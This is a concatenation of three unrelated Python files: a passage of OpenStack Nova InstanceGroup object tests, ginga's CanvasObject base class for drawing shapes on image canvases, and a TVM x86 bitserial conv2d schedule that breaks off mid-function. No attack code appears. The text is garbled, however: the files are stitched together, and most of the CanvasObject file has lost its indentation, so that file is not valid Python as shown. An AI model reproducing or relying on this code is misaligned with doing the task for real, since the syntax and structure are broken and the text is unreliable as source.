        # refresh() must leave the object with no pending changes
        self.assertEqual(set([]), obj_result.obj_what_changed())
    def test_save_simple(self):
        values = self._get_default_values()
        db_result = self._create_instance_group(self.context, values)
        obj_result = instance_group.InstanceGroup.get_by_uuid(self.context,
                                                              db_result.uuid)
        self.assertEqual(obj_result.name, 'fake_name')
        obj_result.name = 'new_name'
        obj_result.save()
        result = db.instance_group_get(self.context, db_result['uuid'])
        self.assertEqual(result['name'], 'new_name')
    def test_save_policies(self):
        values = self._get_default_values()
        db_result = self._create_instance_group(self.context, values)
        obj_result = instance_group.InstanceGroup.get_by_uuid(self.context,
                                                              db_result.uuid)
        policies = ['policy1', 'policy2']
        obj_result.policies = policies
        obj_result.save()
        result = db.instance_group_get(self.context, db_result['uuid'])
        self.assertEqual(result['policies'], policies)
    def test_save_members(self):
        values = self._get_default_values()
        db_result = self._create_instance_group(self.context, values)
        obj_result = instance_group.InstanceGroup.get_by_uuid(self.context,
                                                              db_result.uuid)
        members = ['instance1', 'instance2']
        obj_result.members = members
        obj_result.save()
        result = db.instance_group_get(self.context, db_result['uuid'])
        self.assertEqual(result['members'], members)
    def test_create(self):
        group1 = instance_group.InstanceGroup()
        group1.uuid = 'fake-uuid'
        group1.name = 'fake-name'
        group1.create(self.context)
        group2 = instance_group.InstanceGroup.get_by_uuid(self.context,
                                                          group1.uuid)
        self.assertEqual(group1.id, group2.id)
        self.assertEqual(group1.uuid, group2.uuid)
        self.assertEqual(group1.name, group2.name)
        result = db.instance_group_get(self.context, group1.uuid)
        self.assertEqual(group1.id, result.id)
        self.assertEqual(group1.uuid, result.uuid)
        self.assertEqual(group1.name, result.name)
    def test_create_with_policies(self):
        group1 = instance_group.InstanceGroup()
        group1.policies = ['policy1', 'policy2']
        group1.create(self.context)
        group2 = instance_group.InstanceGroup.get_by_uuid(self.context,
                                                          group1.uuid)
        self.assertEqual(group1.id, group2.id)
        self.assertEqual(group1.policies, group2.policies)
    def test_create_with_members(self):
        group1 = instance_group.InstanceGroup()
        group1.members = ['instance1', 'instance2']
        group1.create(self.context)
        group2 = instance_group.InstanceGroup.get_by_uuid(self.context,
                                                          group1.uuid)
        self.assertEqual(group1.id, group2.id)
        self.assertEqual(group1.members, group2.members)
    def test_recreate_fails(self):
        # Calling create() twice on the same object must raise.
        group = instance_group.InstanceGroup()
        group.create(self.context)
        self.assertRaises(exception.ObjectActionError, group.create,
                          self.context)
    def test_destroy(self):
        values = self._get_default_values()
        result = self._create_instance_group(self.context, values)
        group = instance_group.InstanceGroup()
        group.id = result.id
        group.uuid = result.uuid
        group.destroy(self.context)
        self.assertRaises(exception.InstanceGroupNotFound,
                          db.instance_group_get, self.context, result['uuid'])
    def _populate_instances(self):
        # Create four groups spread over two projects; returns the
        # (uuid, name, project_id) triples that were used.
        instances = [(str(uuid.uuid4()), 'f1', 'p1'),
                     (str(uuid.uuid4()), 'f2', 'p1'),
                     (str(uuid.uuid4()), 'f3', 'p2'),
                     (str(uuid.uuid4()), 'f4', 'p2')]
        for instance in instances:
            values = self._get_default_values()
            values['uuid'] = instance[0]
            values['name'] = instance[1]
            values['project_id'] = instance[2]
            self._create_instance_group(self.context, values)
        return instances
    def test_list_all(self):
        self._populate_instances()
        inst_list = instance_group.InstanceGroupList.get_all(self.context)
        groups = db.instance_group_get_all(self.context)
        self.assertEqual(len(groups), len(inst_list.objects))
        self.assertEqual(len(groups), 4)
        for i in range(0, len(groups)):
            self.assertIsInstance(inst_list.objects[i],
                                  instance_group.InstanceGroup)
            self.assertEqual(inst_list.objects[i].uuid, groups[i]['uuid'])
    def test_list_by_project_id(self):
        self._populate_instances()
        project_ids = ['p1', 'p2']
        for id in project_ids:
            il = instance_group.InstanceGroupList.get_by_project_id(
                    self.context, id)
            groups = db.instance_group_get_all_by_project_id(self.context, id)
            self.assertEqual(len(groups), len(il.objects))
            self.assertEqual(len(groups), 2)
            for i in range(0, len(groups)):
                self.assertIsInstance(il.objects[i],
                                      instance_group.InstanceGroup)
                self.assertEqual(il.objects[i].uuid, groups[i]['uuid'])
                self.assertEqual(il.objects[i].name, groups[i]['name'])
                self.assertEqual(il.objects[i].project_id, id)
    def test_get_by_name(self):
        self._populate_instances()
        ctxt = context.RequestContext('fake_user', 'p1')
        ig = instance_group.InstanceGroup.get_by_name(ctxt, 'f1')
        self.assertEqual('f1', ig.name)
    def test_get_by_hint(self):
        # get_by_hint accepts either a group name or a group uuid.
        instances = self._populate_instances()
        for instance in instances:
            ctxt = context.RequestContext('fake_user', instance[2])
            ig = instance_group.InstanceGroup.get_by_hint(ctxt, instance[1])
            self.assertEqual(instance[1], ig.name)
            ig = instance_group.InstanceGroup.get_by_hint(ctxt, instance[0])
            self.assertEqual(instance[0], ig.uuid)
    def test_add_members(self):
        instance_ids = ['fakeid1', 'fakeid2']
        values = self._get_default_values()
        group = self._create_instance_group(self.context, values)
        members = instance_group.InstanceGroup.add_members(self.context,
                group.uuid, instance_ids)
        group = instance_group.InstanceGroup.get_by_uuid(self.context,
                                                         group.uuid)
        for instance in instance_ids:
            self.assertIn(instance, members)
            self.assertIn(instance, group.members)
    def test_get_hosts(self):
        instance1 = tests_utils.get_test_instance(self.context,
                flavor=flavors.get_default_flavor(), obj=True)
        instance1.host = 'hostA'
        instance1.save()
        instance2 = tests_utils.get_test_instance(self.context,
                flavor=flavors.get_default_flavor(), obj=True)
        instance2.host = 'hostB'
        instance2.save()
        instance3 = tests_utils.get_test_instance(self.context,
                flavor=flavors.get_default_flavor(), obj=True)
        instance3.host = 'hostB'
        instance3.save()
        instance_ids = [instance1.uuid, instance2.uuid, instance3.uuid]
        values = self._get_default_values()
        group = self._create_instance_group(self.context, values)
        instance_group.InstanceGroup.add_members(self.context, group.uuid,
                instance_ids)
        group = instance_group.InstanceGroup.get_by_uuid(self.context,
                                                         group.uuid)
        # Hosts are deduplicated: three instances, two distinct hosts.
        hosts = group.get_hosts(self.context)
        self.assertEqual(2, len(hosts))
        self.assertIn('hostA', hosts)
        self.assertIn('hostB', hosts)
        hosts = group.get_hosts(self.context, exclude=[instance1.uuid])
        self.assertEqual(1, len(hosts))
        self.assertIn('hostB', hosts)
    def test_get_hosts_with_some_none(self):
        # Unscheduled instances (host=None) must not appear in the result.
        instance1 = tests_utils.get_test_instance(self.context,
                flavor=flavors.get_default_flavor(), obj=True)
        instance1.host = None
        instance1.save()
        instance2 = tests_utils.get_test_instance(self.context,
                flavor=flavors.get_default_flavor(), obj=True)
        instance2.host = 'hostB'
        instance2.save()
        instance_ids = [instance1.uuid, instance2.uuid]
        values = self._get_default_values()
        group = self._create_instance_group(self.context, values)
        instance_group.InstanceGroup.add_members(self.context, group.uuid,
                instance_ids)
        group = instance_group.InstanceGroup.get_by_uuid(self.context,
                                                         group.uuid)
        hosts = group.get_hosts(self.context)
        self.assertEqual(1, len(hosts))
        self.assertIn('hostB', hosts)
    def test_obj_make_compatible(self):
        group = instance_group.InstanceGroup(uuid='fake-uuid',
                                             name='fake-name')
        group.create(self.context)
        group_primitive = group.obj_to_primitive()
        group.obj_make_compatible(group_primitive, '1.6')
        self.assertEqual({}, group_primitive['metadetails'])
class TestInstanceGroupObject(test_objects._LocalTest,
                              _TestInstanceGroupObjects):
    # Runs the shared InstanceGroup tests against the local (in-process)
    # object backend.
    pass
class TestRemoteInstanceGroupObject(test_objects._RemoteTest,
                                    _TestInstanceGroupObjects):
    # Runs the shared InstanceGroup tests over the remote (RPC) object
    # backend.
    pass
| |
#
# CanvasObject.py -- base class for shapes drawn on ginga canvases.
#
# This is open-source software licensed under a BSD license.
# Please see the file LICENSE.txt for details.
#
import math
import numpy
from collections import namedtuple
from ginga.misc import Callback, Bunch
from ginga import trcalc, colors
from ginga.util.six.moves import map
from . import coordmap
__all__ = ['CanvasObjectBase', 'get_canvas_type', 'get_canvas_types',
'register_canvas_type', 'register_canvas_types']
# All recognized color names, plus None (meaning "no color").
colors_plus_none = [ None ] + colors.get_colors()

# Simple (x, y) coordinate pair.
Point = namedtuple('Point', ['x', 'y'])

class EditPoint(Point):
    # Base class for edit-mode control points; `edit_color` is the cap
    # color used when drawing the point.
    edit_color = 'yellow'
class MovePoint(EditPoint):
    # Control point used to move/translate the object.
    edit_color = 'orangered'
class ScalePoint(EditPoint):
    # Control point used to scale the object.
    edit_color = 'green'
class RotatePoint(EditPoint):
    # Control point used to rotate the object.
    edit_color = 'skyblue'
class CanvasObjectError(Exception):
    # Raised for misuse of the CanvasObject API.
    pass
class CanvasObjectBase(Callback.Callbacks):
"""This is the abstract base class for a CanvasObject. A CanvasObject
is an item that can be placed on a ImageViewCanvas.
This class defines common methods used by all such objects.
"""
    def __init__(self, **kwdargs):
        """Initialize defaults, then apply arbitrary keyword attributes.

        Subclasses pass their drawing parameters through `kwdargs`, which
        are set directly on the instance.
        """
        if not hasattr(self, 'cb'):
            Callback.Callbacks.__init__(self)
        self.cap = 'ball'
        self.cap_radius = 4
        self.editable = True
        self.coord = 'data'
        self.ref_obj = None
        self.__dict__.update(kwdargs)
        # NOTE(review): these are assigned AFTER kwdargs, so passing
        # data=/crdmap=/tag=/name=/viewer= in kwdargs is silently
        # overwritten — confirm this is intended.
        self.data = None
        self.crdmap = None
        self.tag = None
        if not hasattr(self, 'kind'):
            self.kind = None
        # For debugging
        self.name = None
        self.viewer = None

        # For callbacks
        for name in ('edited', 'pick-down', 'pick-move', 'pick-up',
                     'pick-hover', 'pick-enter', 'pick-leave'):
            self.enable_callback(name)
def initialize(self, canvas, viewer, logger):
self.viewer = viewer
self.logger = logger
if self.crdmap is None:
if self.coord is None:
# default mapping is to data coordinates
self.coord = 'data'
if self.coord == 'offset':
self.crdmap = coordmap.OffsetMapper(viewer, self.ref_obj)
else:
self.crdmap = viewer.get_coordmap(self.coord)
    def sync_state(self):
        """This method is called when changes are made to the parameters.
        Subclasses should override if they need any special state handling.
        """
        pass
def set_data(self, **kwdargs):
if self.data is None:
self.data = Bunch.Bunch(kwdargs)
else:
self.data.update(kwdargs)
def get_data(self, *args):
if len(args) == 0:
return self.data
elif len(args) == 1:
return self.data[args[0]]
elif len(args) == 2:
try:
return self.data[args[0]]
except KeyError:
return args[1]
else:
raise CanvasObjectError("method get_data() takes at most 2 arguments")
    def use_coordmap(self, mapobj):
        # Override the coordinate mapper resolved by initialize().
        self.crdmap = mapobj
    def canvascoords(self, viewer, data_x, data_y, center=None):
        """Map data coordinates to canvas (window) coordinates.

        The `center` keyword is accepted for backward compatibility only
        and is ignored.
        """
        if center is not None:
            self.logger.warn("`center` keyword is ignored and will be deprecated")
        return viewer.get_canvas_xy(data_x, data_y)
def is_compound(self):
return False
def contains_arr(self, x_arr, y_arr):
contains = numpy.asarray([False] * len(x_arr))
return contains
def contains(self, x, y):
return False
def select_contains(self, viewer, x, y):
return self.contains(x, y)
def draw_arrowhead(self, cr, x1, y1, x2, y2):
i1, j1, i2, j2 = self.calc_vertexes(x1, y1, x2, y2)
alpha = getattr(self, 'alpha', 1.0)
cr.set_fill(self.color, alpha=alpha)
cr.draw_polygon(((x2, y2), (i1, j1), (i2, j2)))
cr.set_fill(None)
def draw_caps(self, cr, cap, points, radius=None):
i = 0
for pt in points:
cx, cy = pt
if radius is None:
radius = self.cap_radius
alpha = getattr(self, 'alpha', 1.0)
if cap == 'ball':
color = self.color
# Draw edit control points in different colors than the others
if isinstance(pt, EditPoint):
cr.set_fill('black', alpha=alpha)
cr.draw_circle(cx, cy, radius+2.0)
color = pt.edit_color
cr.set_fill(color, alpha=alpha)
cr.draw_circle(cx, cy, radius)
#cr.set_fill(self, None)
i += 1
def draw_edit(self, cr, viewer):
bbox = self.get_bbox()
cpoints = self.get_cpoints(viewer, points=bbox, no_rotate=True)
cr.set_fill(None)
cr.set_line(color='cyan', style='dash')
cr.draw_polygon(cpoints)
points = self.get_edit_points(viewer)
cpoints = self.get_cpoints(viewer, points=points)
# preserve point types for coloring
def _map_cpt(pt, cpt):
if isinstance(pt, EditPoint):
return pt.__class__(*cpt)
return cpt
cpoints = tuple([ _map_cpt(points[i], cpoints[i])
for i in range(len(points)) ])
self.draw_caps(cr, 'ball', cpoints)
def calc_radius(self, viewer, p1, p2):
x1, y1 = p1
x2, y2 = p2
# TODO: the accuracy of this calculation of radius might be improved?
radius = math.sqrt(abs(y2 - y1)**2 + abs(x2 - x1)**2)
return (x1, y1, radius)
def calc_vertexes(self, start_cx, start_cy, end_cx, end_cy,
arrow_length=10, arrow_degrees=0.35):
angle = math.atan2(end_cy - start_cy, end_cx - start_cx) + math.pi
cx1 = end_cx + arrow_length * math.cos(angle - arrow_degrees);
cy1 = end_cy + arrow_length * math.sin(angle - arrow_degrees);
cx2 = end_cx + arrow_length * math.cos(angle + arrow_degrees);
cy2 = end_cy + arrow_length * math.sin(angle + arrow_degrees);
return (cx1, cy1, cx2, cy2)
def swapxy(self, x1, y1, x2, y2):
if x2 < x1:
x1, x2 = x2, x1
if y2 < y1:
y1, y2 = y2, y1
return (x1, y1, x2, y2)
def scale_font(self, viewer):
zoomlevel = viewer.get_zoom()
if zoomlevel >= -4:
return 14
elif zoomlevel >= -6:
return 12
elif zoomlevel >= -8:
return 10
else:
return 8
def get_points(self):
"""Get the set of points that is used to draw the object.
Points are returned in *data* coordinates.
"""
points = list(map(lambda pt: self.crdmap.to_data(pt[0], pt[1]),
self.points))
return points
def get_data_points(self, points=None):
if points is None:
points = self.points
points = list(map(lambda pt: self.crdmap.to_data(pt[0], pt[1]),
points))
return points
def set_data_points(self, points):
points = list(map(lambda pt: self.crdmap.data_to(pt[0], pt[1]),
points))
self.points = points
def rotate(self, theta_deg, xoff=0, yoff=0):
points = numpy.asarray(self.get_data_points(), dtype=numpy.double)
points = trcalc.rotate_coord(points, theta_deg, [xoff, yoff])
self.set_data_points(points)
def rotate_by(self, theta_deg):
ref_x, ref_y = self.get_reference_pt()
self.rotate(theta_deg, xoff=ref_x, yoff=ref_y)
def rerotate_by(self, theta_deg, detail):
ref_x, ref_y = detail.center_pos
points = numpy.asarray(detail.points, dtype=numpy.double)
points = trcalc.rotate_coord(points, theta_deg, [ref_x, ref_y])
self.set_data_points(points)
def move_delta(self, xoff, yoff):
## self.points = list(map(
## lambda pt: self.crdmap.offset_pt(pt, xoff, yoff),
## self.points))
points = numpy.asarray(self.get_data_points(), dtype=numpy.double)
points.T[0] += xoff
points.T[1] += yoff
self.set_data_points(points)
def move_to(self, xdst, ydst):
x, y = self.get_reference_pt()
return self.move_delta(xdst - x, ydst - y)
def get_num_points(self):
return(len(self.points))
def set_point_by_index(self, i, pt):
points = self.get_data_points()
points[i] = pt
self.set_data_points(points)
def get_point_by_index(self, i):
points = self.get_data_points()
return points[i]
def scale_by(self, scale_x, scale_y):
ctr_x, ctr_y = self.get_center_pt()
pts = numpy.asarray(self.get_data_points(), dtype=numpy.double)
pts[:, 0] = (pts[:, 0] - ctr_x) * scale_x + ctr_x
pts[:, 1] = (pts[:, 1] - ctr_y) * scale_y + ctr_y
self.set_data_points(pts)
def rescale_by(self, scale_x, scale_y, detail):
ctr_x, ctr_y = detail.center_pos
pts = numpy.asarray(detail.points, dtype=numpy.double)
pts[:, 0] = (pts[:, 0] - ctr_x) * scale_x + ctr_x
pts[:, 1] = (pts[:, 1] - ctr_y) * scale_y + ctr_y
self.set_data_points(pts)
def setup_edit(self, detail):
"""subclass should override as necessary."""
detail.center_pos = self.get_center_pt()
def calc_rotation_from_pt(self, pt, detail):
x, y = pt
ctr_x, ctr_y = detail.center_pos
start_x, start_y = detail.start_pos
# calc angle of starting point wrt origin
deg1 = math.degrees(math.atan2(start_y - ctr_y,
start_x - ctr_x))
# calc angle of current point wrt origin
deg2 = math.degrees(math.atan2(y - ctr_y, x - ctr_x))
delta_deg = deg2 - deg1
return delta_deg
def calc_scale_from_pt(self, pt, detail):
x, y = pt
ctr_x, ctr_y = detail.center_pos
start_x, start_y = detail.start_pos
dx, dy = start_x - ctr_x, start_y - ctr_y
# calc distance of starting point wrt origin
dist1 = math.sqrt(dx**2.0 + dy**2.0)
dx, dy = x - ctr_x, y - ctr_y
# calc distance of current point wrt origin
dist2 = math.sqrt(dx**2.0 + dy**2.0)
scale_f = dist2 / dist1
return scale_f
def calc_dual_scale_from_pt(self, pt, detail):
x, y = pt
ctr_x, ctr_y = detail.center_pos
start_x, start_y = detail.start_pos
# calc distance of starting point wrt origin
dx, dy = start_x - ctr_x, start_y - ctr_y
# calc distance of current point wrt origin
ex, ey = x - ctr_x, y - ctr_y
scale_x, scale_y = float(ex) / dx, float(ey) / dy
return scale_x, scale_y
def convert_mapper(self, tomap):
"""
Converts our object from using one coordinate map to another.
NOTE: This is currently NOT WORKING, because radii are not
converted correctly.
"""
frommap = self.crdmap
if frommap == tomap:
return
# convert radii
if hasattr(self, 'radius'):
xc, yc = self.get_center_pt()
# get data coordinates of a point radius away from center
# under current coordmap
x1, y1 = frommap.to_data(xc, yc)
x2, y2 = frommap.to_data(xc + self.radius, yc)
x3, y3 = frommap.to_data(xc, yc + self.radius)
# now convert these data coords to native coords in tomap
nx1, ny1 = tomap.data_to(x1, y1)
nx2, ny2 = tomap.data_to(x2, y2)
nx3, ny3 = tomap.data_to(x3, y3)
# recalculate radius using new coords
self.radius = math.sqrt((nx2 - nx1)**2 + (ny3 - ny1)**2)
elif hasattr(self, 'xradius'):
# similar to above case, but there are 2 radii
xc, yc = self.get_center_pt()
x1, y1 = frommap.to_data(xc, yc)
x2, y2 = frommap.to_data(xc + self.xradius, yc)
x3, y3 = frommap.to_data(xc, yc + self.yradius)
nx1, ny1 = tomap.data_to(x1, y1)
nx2, ny2 = tomap.data_to(x2, y2)
nx3, ny3 = tomap.data_to(x3, y3)
self.xradius = math.fabs(nx2 - nx1)
self.yradius = math.fabs(ny3 - ny1)
# convert points
for i in range(self.get_num_points()):
# convert each point by going to data coords under old map
# and then to native coords in the new map
x, y = self.get_point_by_index(i)
data_x, data_y = frommap.to_data(x, y)
new_x, new_y = tomap.data_to(data_x, data_y)
self.set_point_by_index(i, (new_x, new_y))
# set our map to the new map
self.crdmap = tomap
# TODO: move these into utility module?
#####
def point_within_radius(self, a_arr, b_arr, x, y, canvas_radius,
scale_x=1.0, scale_y=1.0):
"""Point (a, b) and point (x, y) are in data coordinates.
Return True if point (a, b) is within the circle defined by
a center at point (x, y) and within canvas_radius.
"""
dx = numpy.fabs(x - a_arr) * scale_x
dy = numpy.fabs(y - b_arr) * scale_y
new_radius = numpy.sqrt(dx**2 + dy**2)
res = (new_radius <= canvas_radius)
return res
def within_radius(self, viewer, a_arr, b_arr, x, y, canvas_radius):
"""Point (a, b) and point (x, y) are in data coordinates.
Return True if point (a, b) is within the circle defined by
a center at point (x, y) and within canvas_radius.
The distance between points is scaled by the canvas scale.
"""
scale_x, scale_y = viewer.get_scale_xy()
return self.point_within_radius(a_arr, b_arr, x, y, canvas_radius,
scale_x=scale_x, scale_y=scale_y)
def get_pt(self, viewer, points, x, y, canvas_radius=None):
if canvas_radius is None:
canvas_radius = self.cap_radius
if hasattr(self, 'rot_deg'):
# rotate point back to cartesian alignment for test
ctr_x, ctr_y = self.get_center_pt()
xp, yp = trcalc.rotate_pt(x, y, -self.rot_deg,
xoff=ctr_x, yoff=ctr_y)
else:
xp, yp = x, y
# TODO: do this using numpy array()
for i in range(len(points)):
a, b = points[i]
if self.within_radius(viewer, xp, yp, a, b, canvas_radius):
return i
return None
def point_within_line(self, a_arr, b_arr, x1, y1, x2, y2,
canvas_radius):
# TODO: is there an algorithm with the cross and dot products
# that is more efficient?
r = canvas_radius
xmin, xmax = min(x1, x2) - r, max(x1, x2) + r
ymin, ymax = min(y1, y2) - r, max(y1, y2) + r
div = numpy.sqrt((x2 - x1)**2 + (y2 - y1)**2)
d = numpy.fabs((x2 - x1)*(y1 - b_arr) - (x1 - a_arr)*(y2 - y1)) / div
## contains = (xmin <= a_arr <= xmax) and (ymin <= b_arr <= ymax) and \
## (d <= canvas_radius)
contains = numpy.logical_and(
numpy.logical_and(xmin <= a_arr, a_arr <= xmax),
numpy.logical_and(d <= canvas_radius,
numpy.logical_and(ymin <= b_arr, b_arr <= ymax)))
return contains
def within_line(self, viewer, a_arr, b_arr, x1, y1, x2, y2,
canvas_radius):
"""Point (a, b) and points (x1, y1), (x2, y2) are in data coordinates.
Return True if point (a, b) is within the line defined by
a line from (x1, y1) to (x2, y2) and within canvas_radius.
The distance between points is scaled by the canvas scale.
"""
scale_x, scale_y = viewer.get_scale_xy()
new_radius = canvas_radius * 1.0 / min(scale_x, scale_y)
return self.point_within_line(a_arr, b_arr, x1, y1, x2, y2,
new_radius)
#####
def get_center_pt(self):
"""Return the geometric average of points as data_points.
"""
P = numpy.asarray(self.get_data_points(), dtype=numpy.double)
x = P[:, 0]
y = P[:, 1]
ctr_x = numpy.sum(x) / float(len(x))
ctr_y = numpy.sum(y) / float(len(y))
return ctr_x, ctr_y
def get_reference_pt(self):
return self.get_center_pt()
def get_move_scale_rotate_pts(self, viewer):
"""Returns 3 edit control points for editing this object: a move
point, a scale point and a rotate point. These points are all in
data coordinates.
"""
scale = viewer.get_scale_min()
ref_x, ref_y = self.get_center_pt()
xl, yl, xu, yu = self.get_llur()
offset = 8.0 / scale
scl_x, scl_y = xl - offset, yl - offset
rot_x, rot_y = xu + offset, yu + offset
if hasattr(self, 'rot_deg'):
# if this is an object with a rotation attribute, pre rotate
# the control points in the opposite direction, because they
# will be rotated back
theta = -self.rot_deg
scl_x, scl_y = trcalc.rotate_pt(scl_x, scl_y, theta,
xoff=ref_x, yoff=ref_y)
rot_x, rot_y = trcalc.rotate_pt(rot_x, rot_y, theta,
xoff=ref_x, yoff=ref_y)
move_pt = MovePoint(ref_x, ref_y)
scale_pt = ScalePoint(scl_x, scl_y)
rotate_pt = RotatePoint(rot_x, rot_y)
return (move_pt, scale_pt, rotate_pt)
def get_cpoints(self, viewer, points=None, no_rotate=False):
if points is None:
points = self.get_points()
points = numpy.asarray(points)
if (not no_rotate) and hasattr(self, 'rot_deg') and self.rot_deg != 0.0:
# rotate vertices according to rotation
ctr_x, ctr_y = self.get_center_pt()
points = trcalc.rotate_coord(points, self.rot_deg, (ctr_x, ctr_y))
cpoints = tuple(map(lambda p: self.canvascoords(viewer, p[0], p[1]),
points))
return cpoints
def get_bbox(self):
"""
Get lower-left and upper-right coordinates of the bounding box
of this compound object.
Returns
-------
x1, y1, x2, y2: a 4-tuple of the lower-left and upper-right coords
"""
x1, y1, x2, y2 = self.get_llur()
return ((x1, y1), (x1, y2), (x2, y2), (x2, y1))
# this is the data structure to which drawing classes are registered
# (caseless=True: presumably type names are looked up case-insensitively
#  -- TODO confirm against Bunch implementation)
drawCatalog = Bunch.Bunch(caseless=True)
def get_canvas_types():
    """Return the full catalog of registered canvas draw classes."""
    # force registration of all canvas types
    import ginga.canvas.types.all
    return drawCatalog
def get_canvas_type(name):
    """Look up a single registered canvas draw class by name."""
    # force registration of all canvas types
    import ginga.canvas.types.all
    return drawCatalog[name]
def register_canvas_type(name, klass):
    """Register a single canvas draw class under `name`."""
    global drawCatalog
    drawCatalog[name] = klass
def register_canvas_types(klass_dict):
    """Register a mapping of {name: draw class} in one call."""
    global drawCatalog
    drawCatalog.update(klass_dict)
# funky boolean converter
def _bool(st):
    """Convert a value to bool: True only for the (case-insensitive)
    string 'true' (PEP 8: def instead of a lambda assignment)."""
    return str(st).lower() == 'true'
# color converter
def _color(name):
    """Identity color converter: colors are kept as their name strings
    (PEP 8: def instead of a lambda assignment)."""
    return name

# END
| |
# pylint: disable=invalid-name,unused-variable,invalid-name
"""Bitserial conv2d schedule on x86"""
import tvm
from topi.util import get_const_int
from .. import generic, tag
from ..nn.bitserial_conv2d import bitserial_conv2d, _get_schedule, _get_workload
from ..nn.bitserial_conv2d import SpatialPackNCHW, SpatialPackNHWC
from ..nn.bitserial_conv2d import _WORKLOADS, _SCH_TO_DECL_FUNC_QUANT
# Spatial-pack schedule parameters for NCHW layout, indexed positionally
# against _WORKLOADS.  Each entry carries the (vh, vw, vc, ba, bc) tiling
# factors read by _schedule_spatial_conv2d_nchw below.
# NOTE(review): this table has 15 entries while the NHWC table has 11 --
# verify both cover all of _WORKLOADS.
_QUANTIZED_SCHEDULES_NCHW = [
    # resnet
    SpatialPackNCHW(2, 2, 8, 1, 1),
    SpatialPackNCHW(1, 4, 8, 4, 1),
    SpatialPackNCHW(1, 4, 8, 1, 16),
    SpatialPackNCHW(1, 4, 8, 4, 8),
    SpatialPackNCHW(1, 7, 8, 3, 8),
    SpatialPackNCHW(1, 2, 8, 1, 8),
    SpatialPackNCHW(2, 1, 8, 1, 4),
    SpatialPackNCHW(1, 7, 8, 1, 1),
    SpatialPackNCHW(1, 1, 8, 1, 16),
    SpatialPackNCHW(1, 1, 8, 1, 8),
    SpatialPackNCHW(1, 1, 8, 1, 16),

    SpatialPackNCHW(3, 3, 16, 3, 16),
    SpatialPackNCHW(1, 1, 16, 2, 16),
    SpatialPackNCHW(1, 1, 8, 1, 16),
    SpatialPackNCHW(1, 1, 8, 1, 16),
]
# Spatial-pack schedule parameters for NHWC layout, indexed positionally
# against _WORKLOADS (same (vh, vw, vc, ba, bc) meaning as the NCHW table).
_QUANTIZED_SCHEDULES_NHWC = [
    # resnet
    SpatialPackNHWC(2, 2, 8, 1, 1),
    SpatialPackNHWC(1, 4, 8, 4, 1),
    SpatialPackNHWC(1, 4, 8, 1, 16),
    SpatialPackNHWC(1, 4, 8, 4, 8),
    SpatialPackNHWC(1, 7, 8, 3, 8),
    SpatialPackNHWC(1, 2, 8, 1, 8),
    SpatialPackNHWC(2, 1, 8, 1, 4),
    SpatialPackNHWC(1, 7, 8, 1, 1),
    SpatialPackNHWC(1, 1, 8, 1, 16),
    SpatialPackNHWC(1, 1, 8, 1, 8),
    SpatialPackNHWC(1, 1, 8, 1, 16),
]
@_get_schedule.register("cpu")
def _get_schedule_bitserial_conv2d(wkl, layout):
    """Look up the spatial-pack schedule parameters for a known workload.

    Parameters
    ----------
    wkl : workload tuple
        Must be a member of _WORKLOADS.
    layout : str
        Either "NCHW" or "NHWC".

    Returns
    -------
    SpatialPackNCHW or SpatialPackNHWC schedule parameters.

    Raises
    ------
    ValueError
        If the workload is unknown or the layout is unsupported.
    """
    if wkl not in _WORKLOADS:
        raise ValueError("no schedule for such workload: {}".format(wkl))
    idx = _WORKLOADS.index(wkl)
    if layout == "NCHW":
        return _QUANTIZED_SCHEDULES_NCHW[idx]
    if layout == "NHWC":
        return _QUANTIZED_SCHEDULES_NHWC[idx]
    # Previously an unsupported layout fell through with `sch` unbound,
    # raising a confusing UnboundLocalError; fail explicitly instead.
    raise ValueError("unsupported layout: {}".format(layout))
@bitserial_conv2d.register("cpu")
def _declaration_bitserial_conv2d(data, kernel, stride, padding, activation_bits, weight_bits,
                                  layout='NCHW', pack_dtype=None, out_dtype=None, dorefa=False):
    """Declare a bitserial conv2d compute for CPU by dispatching on the
    spatial-pack schedule registered for this workload/layout."""
    if out_dtype is None:
        out_dtype = data.dtype
    assert data.shape[0].value == 1, "only support batch size=1 convolution on rasp"
    assert layout == "NCHW" or layout == "NHWC", "only support layouts NCHW and NHWC"

    workload = _get_workload(data, kernel, stride, padding, out_dtype, layout)
    schedule = _get_schedule(workload, layout)
    declare_fn = _SCH_TO_DECL_FUNC_QUANT[type(schedule)]
    return declare_fn(data, kernel, stride, padding, activation_bits,
                      weight_bits, pack_dtype, out_dtype, dorefa)
@generic.schedule_bitserial_conv2d_nchw.register(["cpu"])
@generic.schedule_bitserial_conv2d_nhwc.register(["cpu"])
def schedule_bitserial_conv2d(outs):
    """CPU schedule for bitserial convolutions NCHW and NHWC.

    Walks the compute graph from `outs`, inlining elementwise/broadcast ops
    and applying the spatial-pack schedule to each bitserial conv stage.
    """
    s = tvm.create_schedule([x.op for x in outs])
    scheduled_ops = []

    def traverse(op):
        """Traverse operators from computation graph"""
        output = op.output(0)
        # inline all one-to-one-mapping operators except the last stage (output)
        if tag.is_broadcast(op.tag) or 'elemwise' in op.tag:
            if op not in s.outputs:
                s[op].compute_inline()
            # BUG FIX: this previously read
            #   `for tensor in op.input_tensors and tensor.op not in scheduled_ops:`
            # which iterates over a boolean expression (and references
            # `tensor` before assignment).  Recurse into each not-yet-
            # scheduled producer with real inputs instead.
            for tensor in op.input_tensors:
                if tensor.op.input_tensors and tensor.op not in scheduled_ops:
                    traverse(tensor.op)

        elif 'spatial_bitserial_conv_nchw' in op.tag or 'spatial_bitserial_conv_nhwc' in op.tag:
            # Unpack the producer chain: conv <- packed data/kernel <- inputs
            conv_out = op.input_tensors[0]
            kernel_vec = conv_out.op.input_tensors[1]
            kernel_q = kernel_vec.op.input_tensors[0]
            kernel = kernel_q.op.input_tensors[0]
            data_vec = conv_out.op.input_tensors[0]
            data_q = data_vec.op.input_tensors[0]
            data = data_q.op.input_tensors[0]
            data_pad = None
            if isinstance(data_q.op, tvm.tensor.ComputeOp) and "pad" in data_q.op.tag:
                # padding stage present: shift the chain down one level
                data_pad = data_q
                data_q = data
                data = data_q.op.input_tensors[0]
            if "QuantizeInput" in kernel.op.name:
                # Need to go up 1 further, from the combine in bitpack
                kernel = kernel.op.input_tensors[0]
            if "QuantizeInput" in data.op.name:
                # Need to go up 1 further, from the combine in bitpack
                data = data.op.input_tensors[0]

            if 'spatial_bitserial_conv_nchw' in op.tag:
                _schedule_spatial_conv2d_nchw(s, data, data_q, data_pad, data_vec,
                                              kernel, kernel_q, kernel_vec,
                                              conv_out, output, outs[0])
            elif 'spatial_bitserial_conv_nhwc' in op.tag:
                _schedule_spatial_conv2d_nhwc(s, data, data_q, data_pad, data_vec,
                                              kernel, kernel_q, kernel_vec,
                                              conv_out, output, outs[0])

